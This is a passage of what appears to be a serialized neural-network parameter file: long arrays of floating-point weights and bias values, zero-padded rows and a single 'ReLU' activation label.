0.2742, -0.05423, 1.338, 0.04678, 0.1089, 0.01304, 0.2289, -0.4214, 0.0427]]
[-0.813739, 1.72039, 0.302293, 1.22807, -2.23986, -1.1174, 0.783662, 0.661371, 0.534477, -1.03214, 2.02122, 1.36008, 0.352529, 0.608458, 1.16055, -0.143968, 0.602132, -0.0770681, 0.261715, 0.13249, 0.372844, 1.98032, -0.802868, -0.0581481, -0.704703, -0.635125, -0.149022, 0.40108, 1.27893, 1.22631, -1.09028, 0.74986, 0.949662, 0.399549, 0.833291, -0.641165, -0.737972, 0.902937, 0.995831, -0.997608, -2.65635, 0.436614, 0.190683, -1.20486, -0.93302, -0.844626, -0.537734, 1.46314, 0.378352, 0.768337, -0.814, 1.721, 0.3022, 1.229, -2.24, -1.117, 0.7837, 0.661, 0.5347, -1.032, 2.021, 1.36, 0.3525, 0.6084, 1.16, -0.1439, 0.602, -0.0771, 0.2617, 0.1324, 0.3728, 1.98, -0.8027, -0.05814, -0.7046, -0.6353, -0.149, 0.4011, 1.279, 1.227, -1.09, 0.75, 0.9497, 0.3997, 0.8335, -0.641, -0.738, 0.903, 0.9956, -0.9976, -2.656, 0.4365, 0.1907, -1.205, -0.933, -0.8447, -0.5376, 1.463, 0.3784, 0.7686]
ReLU
[[-0.0258016, -0.23147, 0.00357239, -0.160139, 0.455888, 0.00866226, -0.144409, 0.281689, -0.175024, 0.109945, -0.0379261, -0.131857, -0.295821, 0.195195, 0.139806, -0.00729179, -0.141377, 0.394225, -0.158041, 0.0501987, 0.032799, 0.105387, 0.796491, -0.261746, 1.55758, 0.152508, 0.0257965, -0.130343, -0.0793802, -0.136027, -0.0787439, -0.159753, 0.160643, 0.700724, -0.499892, -0.128783, 0.0102835, -0.126349, -0.179644, -0.19157, 0.0969934, -0.0762429, 0.255498, -0.283315, 0.171474, 0.283954, -0.188121, 0.310189, -0.819022, 0.321374, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.029235, -0.0646517, -0.0194702, -0.0273329, -0.123711, 0.0272014, -0.311271, 0.387491, -0.0266211, 0.126425, -0.0367029, 0.00890441, -0.0921069, 0.293622, -0.038465, -0.692146, 0.0425142, 0.067165, -0.0214922, 0.258906, -0.312305, -0.048394, 0.192257, -0.0966259, -1.11497, -0.0901181, -0.136752, 0.0297931, 0.108562, 0.0213959, 0.0181624, -0.0561474, -0.0127036, -0.282988, -0.0910787, -0.244484, 0.337415, -0.286699, 0.0182476, -0.0499157, 0.0558242, 0.0213203, 0.198828, -0.0339451, 0.0468098, -0.0206748, 0.0542548, 0.0341185, -0.0972458, -0.193489, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0419427, 0.0469791, -0.259205, 0.153392, -0.813004, 0.135786, 0.166414, -0.360354, 0.131455, -0.258915, -0.070879, 0.147447, -0.180234, -0.0829323, 0.0681898, 0.206445, -0.0485372, -0.0466509, -0.522135, 0.207349, -0.338416, -0.0304985, -0.165788, -0.0850524, -0.0542113, 0.146263, 0.0471087, -0.0209288, 0.0652706, 0.262386, 0.0782358, 0.103645, -0.048559, 0.082573, -0.994834, -1.01183, -2.54072, -0.056925, 0.0736427, -0.140502, -0.14086, 0.0676199, 0.41035, -0.161169, -1.44379, 0.0419447, 0.117976, 0.0449313, -0.122551, -0.383128, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0692117, -0.0593906, -0.0266454, -0.0380537, -0.379338, -0.0512851, -0.847465, 0.264231, 0.0152283, -0.194284, -0.00168858, -0.102485, 0.0698372, 0.107543, 0.166244, 0.104509, -0.109774, -0.0568805, -0.0219747, 0.0473369, -0.0874179, 0.0750282, 0.380817, -0.734915, -3.53736, 0.0558762, -2.01481, -0.0331157, 0.0480766, -0.233404, 0.0184385, -0.511417, -0.0248016, -2.41981, -0.313752, -0.0754298, 0.127132, 0.0944427, 0.190752, -0.0671049, 0.0565998, 0.0693641, -0.470397, -0.229441, 0.196557, 0.0775015, -0.0699385, 0.135819, -0.601233, -0.112589, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.621562, 0.371749, -2.42609, -0.122756, -6.61173, -0.692257, 0.126841, 0.641098, -0.196036, 0.0280142, -0.335779, -0.437676, 0.432885, -0.192703, 0.00438373, -2.10056, -0.120177, -0.882537, 0.129798, 0.13456, 0.274367, 0.116356, 1.03562, -0.11493, -4.60807, -2.19765, 0.0469149, -0.472028, -0.32215, -0.232857, -0.0765277, -0.122182, -0.544378, 1.09031, -0.2938, -0.810782, 1.36429, 0.336158, 0.126724, -0.225823, 0.451782, -0.172242, 0.221477, 0.353405, -1.50194, 0.00829146, -0.337572, -0.372375, 0.106392, -0.835185, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0216475, -0.190664, -1.14335, -0.565587, -1.21574, -0.169935, 0.694361, 0.165916, -0.176057, 0.0696841, -0.141583, -0.424621, 0.537166, -0.135531, -0.130034, 1.21759, -0.350875, 0.0592194, -0.0623637, -0.0193078, -0.420243, -0.0240125, -0.239033, -0.0541694, 0.547746, 0.033792, -0.105567, -0.476358, 0.231366, -0.205493, -0.20943, -0.145826, 0.203535, 0.995602, -0.336254, 0.00424782, 0.845397, 0.10336, 0.084489, -0.418694, 0.184852, -0.164344, -0.113265, 0.0771323, 0.0692943, -0.0244251, -0.223983, -0.295817, -0.155676, 0.450173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.166607, -0.000571974, -0.107335, -0.0051575, 0.0389275, -0.276948, -0.598633, 0.247909, -0.119776, 0.0828589, -0.234715, 0.0550278, -0.0271861, 0.174729, -0.371388, 0.566574, -0.132612, -0.285666, -0.932928, 0.342261, 0.247862, -0.221231, 0.686109, -0.38082, -1.01722, 0.0979986, -3.55436, -1.10308, -0.0263736, -0.4143, -0.0470126, 0.0785754, 0.0791313, 0.598637, -0.211821, 0.383767, -0.0971628, -0.198721, 0.129592, -0.231045, -1.83025, -0.0158202, -0.0826589, -0.2063, -0.624639, -0.22373, -0.074312, -0.154578, 0.423054, -0.358898, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.185604, -0.0783327, 0.0405173, -0.0973599, 0.15335, -0.277103, 0.0179312, 0.0124641, -0.164059, -0.163214, -0.014867, 0.0184011, 0.153689, 0.0126422, 0.0816491, 0.63205, -0.0720117, 0.111781, -0.295277, 0.106842, -0.17705, -0.0833126, 1.30942, 0.0184226, 0.658725, 0.168893, 0.0871526, -0.0588389, -0.0951096, 0.168967, -0.0231794, 0.00155184, 0.215656, -0.0973569, -0.170594, -1.25872, 0.173661, -0.192775, 0.205683, -0.263428, 0.00804938, -0.0975608, 0.0319358, 0.13669, 0.220038, 0.0201503, -0.0136798, 0.00632431, -0.224064, -0.173864, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0285028, -0.0802878, -0.0190977, -0.0312798, 0.151094, -0.00284337, -0.00131775, -0.0121674, -0.0440862, 0.0753536, -0.0183326, -0.0356734, 0.0511998, 0.0510165, -0.0235434, 0.0210343, -0.0132481, -0.0309287, -0.0924074, 0.0119659, 0.0134332, 0.0507727, 0.139767, -0.0135398, 0.158839, 0.0145601, 0.0385023, -0.0462161, 0.0173815, 0.165095, -0.0263825, -0.0443541, 0.00197213, 0.303073, -0.181496, -0.0418246, 0.0361284, 0.0288451, -0.110491, -0.0672174, 0.0468885, 0.001576, 0.0420172, -0.0219738, 0.0712446, 0.118983, 0.0141262, 0.216143, -0.0478446, 0.0918697, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.297269, -0.118462, 0.212879, 0.262913, 0.0218007, 0.179305, -0.00890585, 0.280292, 0.28413, 0.466798, 0.100469, -0.131352, 0.313252, -0.343855, -0.0624251, 0.071888, 0.0555632, 0.403333, -0.0159713, -0.550984, -0.543776, -0.167628, -0.0153654, -0.270992, 0.00247624, -0.379727, -0.38429, 0.205124, -0.247587, 0.42583, -0.181116, 0.360893, -0.437672, -0.310981, -0.114245, 0.137665, 0.0675083, 0.872555, -0.823732, -0.351309, -0.141001, 0.333973, -0.787735, 0.214659, -0.264039, -0.201678, 0.12598, -0.482135, -0.667721, -0.527339, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0741107, -0.0729539, 0.0243897, 0.0169101, 0.135327, -0.127132, 0.0467325, 0.137301, -0.0262298, 0.13519, -0.0127437, 0.0572125, 0.175855, -0.0485776, -0.00965937, 0.675085, -0.00140934, 0.0631601, -0.374849, 0.0958452, 0.108538, -0.0332379, 0.527263, -0.169485, 0.244963, -0.0144966, -0.0654757, -0.0261129, -0.0299719, 0.277353, -0.0160395, 0.0352562, 0.0992832, 0.068419, -0.064303, -0.316142, -0.0521628, -0.0699284, -0.144482, -0.0590779, 0.0403799, -0.0161048, -0.0586745, -0.0271544, 0.0432116, 0.12279, -0.0319608, 0.179969, -0.226467, -0.0282592, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.257112, -0.107049, 0.00802441, -0.0547529, 0.156347, -0.0316876, 0.385207, 0.0702118, -0.154758, 0.17746, 0.00977722, 0.0186646, 0.19456, 0.0855195, -0.106087, 0.215477, -0.0594246, 0.0508124, -0.102059, 0.00979458, 0.0898298, -0.107735, 0.2007, -0.166537, -0.114024, -0.112742, -0.0619062, 0.0457317, -0.169592, -0.0962865, -0.0726888, 0.0193528, 0.128051, 0.234162, 0.0685097, 0.0039244, 0.151275, -0.078022, 0.0316844, -0.00169063, -0.648575, -0.0837157, -0.0144884, 0.000798941, 0.0451498, -0.0660855, 0.0219376, 0.0372027, 0.0349434, 0.230996, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.71568, -0.166551, -0.212621, -0.133977, 0.277569, -2.81849, -0.798868, 0.216226, -0.264188, -0.153353, 0.0720427, 0.168803, 0.381083, 0.616379, -0.367067, 0.577458, -0.0955947, -0.219344, 0.674456, -0.30227, 0.384659, 0.282579, -0.321816, -0.140425, -0.393061, -0.300442, 0.897781, -0.150576, 0.136226, -0.0468537, -0.110654, 0.160105, -0.255399, -0.306277, -0.292535, -1.80473, 0.206619, 0.331433, -0.126953, -0.129643, 0.187699, 0.160233, 0.137356, 0.114188, -0.135276, -0.0256543, -0.0616556, 0.123812, -0.254031, -0.196401, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.979403, -0.123645, 0.2613, -2.97615, 0.377597, -0.341901, 0.0587119, 0.577068, -0.0572139, 0.0170571, -0.0526798, -0.00772473, 0.804532, -0.583145, -0.23409, 0.876251, 0.0125127, -0.718797, 0.00777378, 0.129548, 0.789518, -0.209511, -0.964558, 0.200089, -0.875285, -0.442857, -0.0489493, 0.545753, -0.526329, 0.954469, 0.0358897, 0.0103483, 0.505258, 0.751915, 0.503983, 0.083275, 1.85284, 0.0204114, 0.721685, 0.236733, -0.134002, -0.382997, 0.648337, 0.476355, -0.205407, -0.315524, -0.201778, -0.832343, 0.228483, 0.198143, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0210991, -0.165966, -0.00547017, -0.107727, 0.295288, 0.0170348, -0.0871579, 0.150628, -0.11756, 0.0802052, -0.0292833, -0.0973296, -0.18027, 0.129785, 0.080985, -0.0983142, -0.086412, 0.210093, -0.127318, 0.0106795, 0.00659228, 0.074975, 0.432009, -0.143591, 0.974743, 0.0916842, 0.0176047, -0.0973805, -0.0363975, -0.0709328, -0.0564572, -0.0884216, 0.107842, 0.513564, -0.356642, -0.0914048, 0.00620391, -0.0723126, -0.163673, -0.126888, 0.0731371, -0.0373321, 0.162283, -0.179552, 0.115317, 0.1973, -0.0972321, 0.239698, -0.469952, 0.218666, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.36441, -0.132012, 0.0804094, -0.0945326, -0.775636, -0.69069, -0.0477259, 0.283791, -0.460196, 0.0887096, -0.0472329, -0.0977718, -0.503173, 0.331544, 0.0803581, -0.552731, 0.0254025, 0.65388, -0.0731032, 0.257224, 0.302775, -0.0824733, -0.249731, -0.22691, -1.02132, -0.160784, 0.341393, 0.0645548, -1.17604, 0.122323, -0.113188, -0.0795917, -0.361766, 0.225467, -0.0496277, -0.0481296, -0.0305203, 0.237251, -0.290487, 0.0123094, 0.0651388, 0.180411, -0.362092, -0.189182, -0.147283, -0.0139544, -0.264639, 0.1535, -0.0693186, 0.101178, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.396435, 0.0132362, -0.167214, -0.0365077, 0.14331, -1.37637, 0.066098, 0.0676383, -0.284426, 0.107661, -0.0979637, -0.0381316, 0.261001, -0.0851133, 0.0679622, 0.339413, -0.208538, 0.00544647, -0.0132891, 0.117285, 0.115448, -0.0219588, 1.08808, -0.211522, 0.456961, 0.0213237, 0.297041, -0.286903, 0.105222, -0.263843, -0.0236176, -0.00657093, -0.0212172, -0.484568, 0.158064, -0.0145087, 0.333502, 0.189636, 0.0810343, -0.125333, -0.142442, 0.0133973, -0.227786, 0.0818951, 0.0707584, -0.0249424, -0.0507563, -0.0353614, -0.52958, 0.113912, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0435409, -0.0133825, -0.0308654, -0.0149242, 0.133138, -0.230148, 0.0243181, 0.295308, -0.0630574, 0.0524762, -0.0313252, -0.0163577, 0.109298, 0.0153623, -0.391429, 0.310014, 0.0157341, -0.259949, -0.381665, 0.138856, 0.0789848, -0.11167, 0.506663, -0.106027, 0.37007, -0.335757, -0.185752, -0.215149, -0.0703311, 0.508688, 0.00461321, -0.0528272, 0.105692, 0.0229892, -0.115154, 0.0374228, 0.301248, 0.0933898, -0.309089, -0.197939, -0.287879, -0.152514, 0.0315242, 0.101578, 0.117025, -0.0306791, -0.0364285, 0.104031, 0.241301, -0.0465528, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0328329, -0.0312707, -0.0065044, 0.0375223, 0.0145014, 0.0340988, -0.0291172, -0.00879694, -0.0124429, -0.0125286, -0.0060431, -0.0430946, 0.0445759, -0.0339221, -0.0373521, -0.0313966, -0.0338188, 0.00439441, -0.0259512, -0.0178291, -0.0210854, -0.0273673, -0.0332994, 0.00974389, 0.0462788, 0.024737, -0.0345382, -0.0561951, -0.0108141, -0.0274674, -0.0218718, 0.0211264, -0.0223155, -0.0522863, -0.000298687, -0.00583176, -0.0254912, -0.0388542, -0.0151135, -0.0767137, 0.0101308, -0.00506449, 0.0195652, -0.0138874, 0.0212485, -0.004192, -0.0699397, 0.00556573, 0.0390745, -0.0201153, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.882636, 0.310148, 0.0772045, -0.131999, 0.151275, 0.817937, 0.866256, 0.609467, -0.112224, 0.442711, 0.0426014, -0.244746, -0.0365439, 0.0141662, 0.535207, 0.437857, -1.44273, -1.41426, -2.72876, -0.162382, -0.782547, -0.572419, 0.0479226, -0.250449, 0.56186, 0.40004, 0.305303, -0.827933, -0.0180625, 0.280068, -0.927353, -0.257434, 0.182868, 0.566789, 0.774613, 0.34881, 1.20187, 0.886014, 0.0220059, -0.262252, -0.290478, 0.446285, -0.323595, 0.0522102, 0.265695, -0.246617, 0.34151, 0.0528599, 0.788863, -0.102466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.109284, -0.156952, -0.00718559, -0.0512496, 0.301354, -0.086483, 0.121337, 0.092251, -0.0904305, -0.312373, -0.00102088, -0.00226096, -0.126922, 0.142481, 0.148623, -0.243375, -0.032754, 0.159503, 0.00575423, 0.119929, -0.0454488, -0.0654941, 0.429635, 0.0621951, 2.04574, -0.147236, 0.152621, 0.0505721, 0.0174439, 0.0632396, -0.0890005, 0.0364569, -0.232414, 0.0980076, -0.124537, -0.0143755, 0.321538, 0.118286, -0.0302487, -0.00540771, -0.00901383, 0.0424574, -0.0963901, -0.0935867, 0.201692, -0.0432249, -0.130975, 0.0989376, 0.244868, -0.0113106, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0683815, 0.0106784, 0.00390193, 0.144058, -4.18056, 0.148034, 0.498616, -0.300653, -0.0650458, 0.125065, 0.0186263, -0.068641, -0.710487, -0.209201, 0.0146473, 0.200357, -0.0246016, -2.67447, -0.00197067, 0.228489, 0.00862881, -0.0714957, 0.725849, -0.0368965, -0.148317, -0.0369188, -0.172599, -0.0167319, -0.00182902, 0.609747, -0.0146095, -0.000372265, 0.0263804, -0.0434928, -0.311821, -0.013342, 0.671058, 0.246208, 0.423826, -0.0913106, -0.0520307, -0.102068, -0.387919, 0.0267873, -0.185662, -0.0402956, 0.0350207, -0.190001, 0.0772644, 0.00573517, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.414388, -0.0310086, 0.316446, 0.203115, -1.81021, -0.203296, 0.391015, -0.687691, -0.233469, -0.0611803, 0.0357074, -0.691347, -2.44111, 0.0687253, 0.0310662, 0.218588, -0.160374, 0.230459, -0.707397, -0.629791, 0.000627439, 0.380225, 3.12233, 0.338458, 0.0993963, 0.661171, -1.21035, 0.0283629, -0.0534581, 1.10649, 0.0826446, -0.251701, 0.318202, 0.0586825, 0.0589816, 0.0609962, 0.672858, -0.0459308, 0.174732, -0.112458, -0.349839, 0.137001, -0.465889, -1.82024, -0.585175, -0.155478, -0.13197, 0.197653, 0.085661, -0.16572, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.105231, -0.00974975, 0.00168184, 0.0197163, -0.403805, -0.24848, 0.407752, 0.0332032, -0.166447, 0.0850787, -0.219798, -0.425707, 0.0755693, 0.366576, -0.168146, 0.175608, -0.151553, 0.0580766, -0.20895, -0.38812, -0.0507966, -0.0159137, 0.524287, -0.0795892, 0.297106, -0.0926983, -0.0709329, -0.0728336, 0.144199, 0.226517, -0.0410385, 0.139978, -0.044314, 0.442128, 0.0258478, 0.0980453, -0.0806505, 0.14309, -0.0926758, -0.00334053, 0.209233, 0.00748794, 0.0823893, 0.171727, -0.233012, 0.0823122, 0.0856891, 0.291588, 0.0946487, -0.155753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.842409, -0.670159, 0.250403, -0.0427264, -0.174797, -2.14052, -0.589958, 1.05488, 0.594909, -0.600735, 0.291759, 0.0144254, -1.76525, -0.208486, -0.301235, -1.67846, -0.957711, 1.17038, -0.902834, -0.855703, 0.921776, -0.677409, 0.473776, -0.408638, -1.85875, 0.27174, -1.24471, 0.567056, 0.394496, -1.16769, 0.0353048, 0.249966, -0.691587, 0.229025, -0.246029, 0.143334, -2.99382, 1.09541, 0.569629, 0.056749, 0.0942325, 0.280204, -0.258972, 0.728191, 0.224988, -0.195338, -5.57188, 0.0688956, 1.07309, -1.58059, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.02706, 0.455693, -0.544531, -1.03293, 0.752081, -0.495077, 0.0295638, 0.210392, 0.0982198, -0.510222, -0.172507, 0.209715, -2.5597, -0.666255, 